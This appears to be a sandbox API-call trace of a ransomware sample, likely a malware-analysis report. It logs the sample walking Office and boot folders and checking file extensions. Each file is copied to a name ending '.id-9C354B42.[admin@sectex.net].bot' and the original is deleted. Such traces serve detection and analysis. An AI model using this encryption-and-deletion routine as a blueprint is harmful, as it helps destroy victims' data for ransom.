	[0171.685] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1
	[0171.685] lstrlenW (lpString=".xlsx") returned 5
	[0171.685] lstrcmpiW (lpString1=".xlsx", lpString2="t.ico") returned -1
	[0171.685] lstrlenW (lpString=".ppt") returned 4
	[0171.685] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1
	[0171.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxalert.ico") returned 79
	[0171.685] lstrlenW (lpString=".zip") returned 4
	[0171.685] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1
	[0171.685] lstrlenW (lpString=".rar") returned 4
	[0171.685] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1
	[0171.685] lstrlenW (lpString=".bz2") returned 4
	[0171.685] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1
	[0171.685] lstrlenW (lpString=".7z") returned 3
	[0171.685] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1
	[0171.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxalert.ico") returned 79
	[0171.686] lstrlenW (lpString=".dbf") returned 4
	[0171.686] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1
	[0171.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxalert.ico") returned 79
	[0171.686] lstrlenW (lpString=".1cd") returned 4
	[0171.686] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1
	[0171.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxalert.ico") returned 79
	[0171.686] lstrlenW (lpString=".jpg") returned 4
	[0171.686] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1
	[0171.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxalert.ico") returned 79
	[0171.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxalert.ico") returned 79
	[0171.686] lstrlenW (lpString=".doc") returned 4
	[0171.686] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1
	[0171.686] lstrlenW (lpString=".docx") returned 5
	[0171.686] lstrcmpiW (lpString1=".docx", lpString2="t.ico") returned -1
	[0171.686] lstrlenW (lpString=".pdf") returned 4
	[0171.686] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1
	[0171.686] lstrlenW (lpString=".xls") returned 4
	[0171.686] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1
	[0171.686] lstrlenW (lpString=".xlsx") returned 5
	[0171.686] lstrcmpiW (lpString1=".xlsx", lpString2="t.ico") returned -1
	[0171.686] lstrlenW (lpString=".ppt") returned 4
	[0171.686] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1
	[0171.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxalert.ico") returned 79
	[0171.686] lstrlenW (lpString=".zip") returned 4
	[0171.686] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1
	[0171.686] lstrlenW (lpString=".rar") returned 4
	[0171.686] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1
	[0171.686] lstrlenW (lpString=".bz2") returned 4
	[0171.686] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1
	[0171.687] lstrlenW (lpString=".7z") returned 3
	[0171.687] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1
	[0171.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxalert.ico") returned 79
	[0171.687] lstrlenW (lpString=".dbf") returned 4
	[0171.687] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1
	[0171.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxalert.ico") returned 79
	[0171.687] lstrlenW (lpString=".1cd") returned 4
	[0171.687] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1
	[0171.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxalert.ico") returned 79
	[0171.687] lstrlenW (lpString=".jpg") returned 4
	[0171.687] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1
	[0171.687] lstrcmpiW (lpString1=".ico", lpString2=".bot") returned 1
	[0171.687] lstrlenW (lpString="messageboxerror.ico") returned 19
	[0171.687] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxerror.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\messageboxerror.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354
	[0171.688] GetFileSizeEx (in: hFile=0x354, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=2862) returned 1
	[0171.688] CloseHandle (hObject=0x354) returned 1
	[0171.688] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxerror.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\messageboxerror.ico")) returned 0x20
	[0171.688] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxerror.ico.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\messageboxerror.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.689] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxerror.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\messageboxerror.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354
	[0171.689] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.689] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.689] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxerror.ico.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\messageboxerror.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188
	[0171.690] GetLastError () returned 0x0
	[0171.690] ReadFile (in: hFile=0x354, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0xb2e, lpOverlapped=0x0) returned 1
	[0171.691] WriteFile (in: hFile=0x188, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xb30, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xb30, lpOverlapped=0x0) returned 1
	[0171.692] ReadFile (in: hFile=0x354, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.692] WriteFile (in: hFile=0x188, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xfa, lpOverlapped=0x0) returned 1
	[0171.692] SetEndOfFile (hFile=0x188) returned 1
	[0171.692] CloseHandle (hObject=0x188) returned 1
	[0171.693] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.693] SetEndOfFile (hFile=0x354) returned 1
	[0171.695] CloseHandle (hObject=0x354) returned 1
	[0171.695] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxerror.ico.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.695] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxerror.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\messageboxerror.ico")) returned 1
	[0171.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxerror.ico") returned 79
	[0171.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxerror.ico") returned 79
	[0171.696] lstrlenW (lpString=".doc") returned 4
	[0171.696] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1
	[0171.696] lstrlenW (lpString=".docx") returned 5
	[0171.696] lstrcmpiW (lpString1=".docx", lpString2="r.ico") returned -1
	[0171.696] lstrlenW (lpString=".pdf") returned 4
	[0171.696] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1
	[0171.696] lstrlenW (lpString=".xls") returned 4
	[0171.696] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1
	[0171.696] lstrlenW (lpString=".xlsx") returned 5
	[0171.696] lstrcmpiW (lpString1=".xlsx", lpString2="r.ico") returned -1
	[0171.696] lstrlenW (lpString=".ppt") returned 4
	[0171.696] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1
	[0171.696] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxerror.ico") returned 79
	[0171.697] lstrlenW (lpString=".zip") returned 4
	[0171.697] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1
	[0171.697] lstrlenW (lpString=".rar") returned 4
	[0171.697] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1
	[0171.697] lstrlenW (lpString=".bz2") returned 4
	[0171.697] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1
	[0171.697] lstrlenW (lpString=".7z") returned 3
	[0171.697] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1
	[0171.697] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxerror.ico") returned 79
	[0171.697] lstrlenW (lpString=".dbf") returned 4
	[0171.697] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1
	[0171.697] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxerror.ico") returned 79
	[0171.697] lstrlenW (lpString=".1cd") returned 4
	[0171.697] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1
	[0171.697] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxerror.ico") returned 79
	[0171.697] lstrlenW (lpString=".jpg") returned 4
	[0171.697] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1
	[0171.697] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxerror.ico") returned 79
	[0171.697] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxerror.ico") returned 79
	[0171.697] lstrlenW (lpString=".doc") returned 4
	[0171.697] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1
	[0171.697] lstrlenW (lpString=".docx") returned 5
	[0171.697] lstrcmpiW (lpString1=".docx", lpString2="r.ico") returned -1
	[0171.697] lstrlenW (lpString=".pdf") returned 4
	[0171.697] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1
	[0171.697] lstrlenW (lpString=".xls") returned 4
	[0171.697] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1
	[0171.697] lstrlenW (lpString=".xlsx") returned 5
	[0171.697] lstrcmpiW (lpString1=".xlsx", lpString2="r.ico") returned -1
	[0171.697] lstrlenW (lpString=".ppt") returned 4
	[0171.698] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1
	[0171.698] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxerror.ico") returned 79
	[0171.698] lstrlenW (lpString=".zip") returned 4
	[0171.698] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1
	[0171.698] lstrlenW (lpString=".rar") returned 4
	[0171.698] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1
	[0171.698] lstrlenW (lpString=".bz2") returned 4
	[0171.698] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1
	[0171.698] lstrlenW (lpString=".7z") returned 3
	[0171.698] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1
	[0171.698] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxerror.ico") returned 79
	[0171.698] lstrlenW (lpString=".dbf") returned 4
	[0171.698] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1
	[0171.698] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxerror.ico") returned 79
	[0171.698] lstrlenW (lpString=".1cd") returned 4
	[0171.698] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1
	[0171.698] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxerror.ico") returned 79
	[0171.698] lstrlenW (lpString=".jpg") returned 4
	[0171.698] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1
	[0171.698] lstrcmpiW (lpString1=".ico", lpString2=".bot") returned 1
	[0171.698] lstrlenW (lpString="messageboxinfo.ico") returned 18
	[0171.698] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\messageboxinfo.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\messageboxinfo.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) 

Thread:
	id = 62
	os_tid = 0x784

	[0137.450] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10000) returned 0xb4b0048
	[0137.451] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10000) returned 0xb4c0050
	[0137.451] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7baeb18
	[0137.451] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x6) returned 0x7bac868
	[0137.451] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7baeb30
	[0137.451] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x100000) returned 0xb6b0020
	[0137.452] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7baeb48
	[0137.452] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7baeb48, Size=0x20) returned 0x7b65b58
	[0137.452] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7baeb48
	[0137.452] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7baeb48, Size=0x20) returned 0x7b65ab8
	[0137.452] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77080000
	[0137.452] GetProcAddress (hModule=0x77080000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x770ad650
	[0137.452] Wow64DisableWow64FsRedirection (in: OldValue=0xabcff58 | out: OldValue=0xabcff58*=0x0) returned 1
	[0137.452] lstrlenW (lpString="kernel32.dll") returned 12
	[0137.452] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b65b58 | out: hHeap=0x7ab0000) returned 1
	[0137.452] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0137.452] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b65ab8 | out: hHeap=0x7ab0000) returned 1
	[0137.452] Sleep (dwMilliseconds=0x64) 
	[0137.598] Sleep (dwMilliseconds=0x64) 
	[0137.824] lstrcmpiW (lpString1=".ttf", lpString2=".bot") returned 1
	[0137.824] lstrlenW (lpString="kor_boot.ttf") returned 12
	[0137.824] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec
	[0137.950] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=2371360) returned 1
	[0137.950] CloseHandle (hObject=0x2ec) returned 1
	[0137.950] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf")) returned 0x20
	[0137.950] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0137.950] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\kor_boot.ttf.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0137.950] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26
	[0137.950] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26
	[0137.950] lstrlenW (lpString=".doc") returned 4
	[0137.950] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1
	[0137.951] lstrlenW (lpString=".docx") returned 5
	[0137.951] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1
	[0137.951] lstrlenW (lpString=".pdf") returned 4
	[0137.951] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1
	[0137.951] lstrlenW (lpString=".xls") returned 4
	[0137.951] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1
	[0137.951] lstrlenW (lpString=".xlsx") returned 5
	[0137.951] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1
	[0137.951] lstrlenW (lpString=".ppt") returned 4
	[0137.951] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1
	[0137.951] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26
	[0137.951] lstrlenW (lpString=".zip") returned 4
	[0137.951] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1
	[0137.951] lstrlenW (lpString=".rar") returned 4
	[0137.951] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1
	[0137.951] lstrlenW (lpString=".bz2") returned 4
	[0137.951] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1
	[0137.951] lstrlenW (lpString=".7z") returned 3
	[0137.951] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1
	[0137.951] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26
	[0137.951] lstrlenW (lpString=".dbf") returned 4
	[0137.951] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1
	[0137.951] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26
	[0137.951] lstrlenW (lpString=".1cd") returned 4
	[0137.951] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1
	[0137.951] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26
	[0137.951] lstrlenW (lpString=".jpg") returned 4
	[0137.951] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1
	[0137.951] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26
	[0137.951] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26
	[0137.951] lstrlenW (lpString=".doc") returned 4
	[0137.951] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1
	[0137.951] lstrlenW (lpString=".docx") returned 5
	[0137.951] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1
	[0137.952] lstrlenW (lpString=".pdf") returned 4
	[0137.952] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1
	[0137.952] lstrlenW (lpString=".xls") returned 4
	[0137.952] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1
	[0137.952] lstrlenW (lpString=".xlsx") returned 5
	[0137.952] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1
	[0137.952] lstrlenW (lpString=".ppt") returned 4
	[0137.952] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1
	[0137.952] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26
	[0137.952] lstrlenW (lpString=".zip") returned 4
	[0137.952] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1
	[0137.952] lstrlenW (lpString=".rar") returned 4
	[0137.952] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1
	[0137.952] lstrlenW (lpString=".bz2") returned 4
	[0137.952] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1
	[0137.952] lstrlenW (lpString=".7z") returned 3
	[0137.952] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1
	[0137.952] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26
	[0137.952] lstrlenW (lpString=".dbf") returned 4
	[0137.952] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1
	[0137.952] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26
	[0137.952] lstrlenW (lpString=".1cd") returned 4
	[0137.952] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1
	[0137.952] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26
	[0137.952] lstrlenW (lpString=".jpg") returned 4
	[0137.952] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1
	[0137.952] lstrcmpiW (lpString1=".mui", lpString2=".bot") returned 1
	[0137.952] lstrlenW (lpString="bootmgr.exe.mui") returned 15
	[0137.952] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec
	[0137.953] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=93248) returned 1
	[0137.953] CloseHandle (hObject=0x2ec) returned 1
	[0137.953] GetFileAttributesW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui")) returned 0x20
	[0137.953] GetFileAttributesW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0137.953] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0137.953] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29
	[0137.953] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29
	[0137.953] lstrlenW (lpString=".doc") returned 4
	[0137.953] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0137.953] lstrlenW (lpString=".docx") returned 5
	[0137.953] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0137.953] lstrlenW (lpString=".pdf") returned 4
	[0137.953] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0137.953] lstrlenW (lpString=".xls") returned 4
	[0137.953] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0137.953] lstrlenW (lpString=".xlsx") returned 5
	[0137.953] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0137.953] lstrlenW (lpString=".ppt") returned 4
	[0137.953] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0137.953] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29
	[0137.954] lstrlenW (lpString=".zip") returned 4
	[0137.954] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0137.954] lstrlenW (lpString=".rar") returned 4
	[0137.954] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0137.954] lstrlenW (lpString=".bz2") returned 4
	[0137.954] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0137.954] lstrlenW (lpString=".7z") returned 3
	[0137.954] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0137.954] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29
	[0137.954] lstrlenW (lpString=".dbf") returned 4
	[0137.954] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0137.954] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29
	[0137.954] lstrlenW (lpString=".1cd") returned 4
	[0137.954] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0137.954] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29
	[0137.954] lstrlenW (lpString=".jpg") returned 4
	[0137.954] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0137.954] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29
	[0137.954] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29
	[0137.954] lstrlenW (lpString=".doc") returned 4
	[0137.954] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0137.954] lstrlenW (lpString=".docx") returned 5
	[0137.954] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0137.954] lstrlenW (lpString=".pdf") returned 4
	[0137.954] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0137.954] lstrlenW (lpString=".xls") returned 4
	[0137.954] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0137.954] lstrlenW (lpString=".xlsx") returned 5
	[0137.954] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0137.954] lstrlenW (lpString=".ppt") returned 4
	[0137.954] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0137.954] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29
	[0137.955] lstrlenW (lpString=".zip") returned 4
	[0137.955] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0137.955] lstrlenW (lpString=".rar") returned 4
	[0137.955] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0137.955] lstrlenW (lpString=".bz2") returned 4
	[0137.955] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0137.955] lstrlenW (lpString=".7z") returned 3
	[0137.955] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0137.955] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29
	[0137.955] lstrlenW (lpString=".dbf") returned 4
	[0137.955] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0137.955] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29
	[0137.955] lstrlenW (lpString=".1cd") returned 4
	[0137.955] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0137.955] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29
	[0137.955] lstrlenW (lpString=".jpg") returned 4
	[0137.955] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0137.955] lstrcmpiW (lpString1=".mui", lpString2=".bot") returned 1
	[0137.955] lstrlenW (lpString="bootmgr.exe.mui") returned 15
	[0137.955] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec
